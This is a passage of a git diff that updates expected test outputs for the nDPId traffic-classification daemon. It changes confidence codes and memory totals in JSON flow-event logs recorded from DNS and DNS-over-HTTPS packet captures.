{"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625744124461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1625744124461,"pkt":"VASmitEsEL9IThY0CABFAABo+pEAADwRZxEICAgICsgCCwA1r1MAVN6x7MqBgAABAAEAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAcAMAAEAAQAAADsABCncnmAAACkCAAAAAAAAAA=="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":1947,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":63,"global_ts_msec":1625744124461} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -69,9 +69,9 @@ ~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879580 bytes -~~ total memory freed........: 5879580 bytes -~~ total allocations/frees...: 118171/118171 +~~ total memory allocated....: 6013214 bytes +~~ total memory freed........: 6013214 bytes +~~ total allocations/frees...: 120933/120933 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 901 chars diff --git a/test/results/dns_doh.pcap.out b/test/results/dns_doh.pcap.out index 89185788c..e86c58bec 100644 --- a/test/results/dns_doh.pcap.out +++ b/test/results/dns_doh.pcap.out @@ -4,9 +4,9 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":142,"packets-processed":142,"total-skipped-flows":0,"total-l4-payload-len":12658,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1571089204031} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 142/142 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875651 bytes -~~ total memory freed........: 5875651 bytes -~~ total allocations/frees...: 118259/118259 +~~ total memory allocated....: 6009285 bytes +~~ total memory freed........: 6009285 bytes +~~ total allocations/frees...: 121021/121021 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 958 chars diff --git a/test/results/dns_dot.pcap.out b/test/results/dns_dot.pcap.out index b62b33ef4..d8189bd66 100644 --- a/test/results/dns_dot.pcap.out +++ b/test/results/dns_dot.pcap.out @@ -4,9 +4,9 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} 